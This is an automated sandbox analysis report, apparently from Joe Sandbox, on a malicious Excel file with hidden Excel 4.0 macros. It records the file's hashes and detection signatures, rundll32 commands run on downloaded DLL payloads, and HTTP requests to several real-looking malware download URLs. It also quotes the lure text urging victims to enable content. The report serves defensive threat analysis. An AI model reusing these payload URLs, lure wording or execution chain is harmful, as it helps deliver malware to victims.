Create Interactive Tour

Analysis Report SecuriteInfo.com.XF.AShadow.4960.21593.8307

Overview

General Information

Sample Name:SecuriteInfo.com.XF.AShadow.4960.21593.8307 (renamed file extension from 8307 to xls)
Analysis ID:357282
MD5:b00ae2a23ee80960d42e155f9814b490
SHA1:7673823a676d34a46128f8f6d7f09e8b2f3d8db4
SHA256:80d0f40411596b3f2350399c4d76f19d892771f835c1b2f6e3c77955e72e784f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w7x64
  • EXCEL.EXE (PID: 2516 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2924 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2892 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2876 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2512 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 3036 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.XF.AShadow.4960.21593.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xadf2:$e1: Enable Editing
  • 0xae3c:$e1: Enable Editing
  • 0x158cc:$e1: Enable Editing
  • 0x15916:$e1: Enable Editing
  • 0x20083:$e1: Enable Editing
  • 0x200cd:$e1: Enable Editing
  • 0xae5a:$e2: Enable Content
  • 0x15934:$e2: Enable Content
  • 0x200eb:$e2: Enable Content
SecuriteInfo.com.XF.AShadow.4960.21593.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2516, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 2924

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domain
    Source: http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.datAvira URL Cloud: Label: malware

    Compliance:

    barindex
    Uses new MSVCR Dlls
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connections
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49170 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: rzminc.com
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 138.36.237.100:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 72.52.227.180:80
    Source: Joe Sandbox ViewIP Address: 162.241.80.6 162.241.80.6
    Source: Joe Sandbox ViewIP Address: 138.36.237.100 138.36.237.100
    Source: Joe Sandbox ViewIP Address: 68.66.216.42 68.66.216.42
    Source: Joe Sandbox ViewIP Address: 72.52.227.180 72.52.227.180
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: rzminc.com
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49170 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 Macro
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xlsInitial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enabk 14 from the yellow bar above f y-t."|| I xa I 15 " lnn|| I F?
    Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click Enabli " ' ' 14 from the yellow bar above RunDLL |~| 15 16 Therewas
    Source: Screenshot number: 12Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI 0 16 ' 17 I 18
    Source: Screenshot number: 12Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI 0 16 ' 17 I 18 I WHY I CANNOTOPEN THIS DocU
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulas
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xlsInitial sample: EXEC
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xlsOLE indicator, VBA macros: true
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal84.expl.evad.winXLS@11/13@6/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\5BCE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC457.tmpJump to behavior
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in Excel
    Source: Yara matchFile source: SecuriteInfo.com.XF.AShadow.4960.21593.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 357282 Sample: SecuriteInfo.com.XF.AShadow... Startdate: 24/02/2021 Architecture: WINDOWS Score: 84 24 Antivirus detection for URL or domain 2->24 26 Found malicious Excel 4.0 Macro 2->26 28 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->28 30 3 other signatures 2->30 6 EXCEL.EXE 90 52 2->6         started        process3 dnsIp4 18 pathinanchilearthmovers.com 162.241.80.6, 49168, 80 UNIFIEDLAYER-AS-1US United States 6->18 20 rzminc.com 72.52.227.180, 49167, 49174, 80 LIQUIDWEBUS United States 6->20 22 3 other IPs or domains 6->22 32 Document exploit detected (process start blacklist hit) 6->32 34 Document exploit detected (UrlDownloadToFile) 6->34 10 rundll32.exe 6->10         started        12 rundll32.exe 6->12         started        14 rundll32.exe 6->14         started        16 2 other processes 6->16 signatures5 process6

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://rzminc.com/xklyulyijvn/44251495573726900000.dat0%Avira URL Cloudsafe
    http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat100%Avira URL Cloudmalware
    http://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat0%Avira URL Cloudsafe
    http://biblicalisraeltours.com/otmchxmxeg/44251495573726900000.dat0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://rzminc.com/fdzgprclatqo/44251495573726900000.dat0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    rzminc.com
    72.52.227.180
    truefalse
      unknown
      biblicalisraeltours.com
      68.66.216.42
      truefalse
        unknown
        crt.sectigo.com
        91.199.212.52
        truefalse
          unknown
          jugueterialatorre.com.ar
          138.36.237.100
          truefalse
            unknown
            pathinanchilearthmovers.com
            162.241.80.6
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://rzminc.com/xklyulyijvn/44251495573726900000.datfalse
              • Avira URL Cloud: safe
              unknown
              http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dattrue
              • Avira URL Cloud: malware
              unknown
              http://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.datfalse
              • Avira URL Cloud: safe
              unknown
              http://biblicalisraeltours.com/otmchxmxeg/44251495573726900000.datfalse
              • Avira URL Cloud: safe
              unknown
              http://rzminc.com/fdzgprclatqo/44251495573726900000.datfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpfalse
                high
                http://www.windows.com/pctv.rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpfalse
                  high
                  http://investor.msn.comrundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpfalse
                    high
                    http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpfalse
                      high
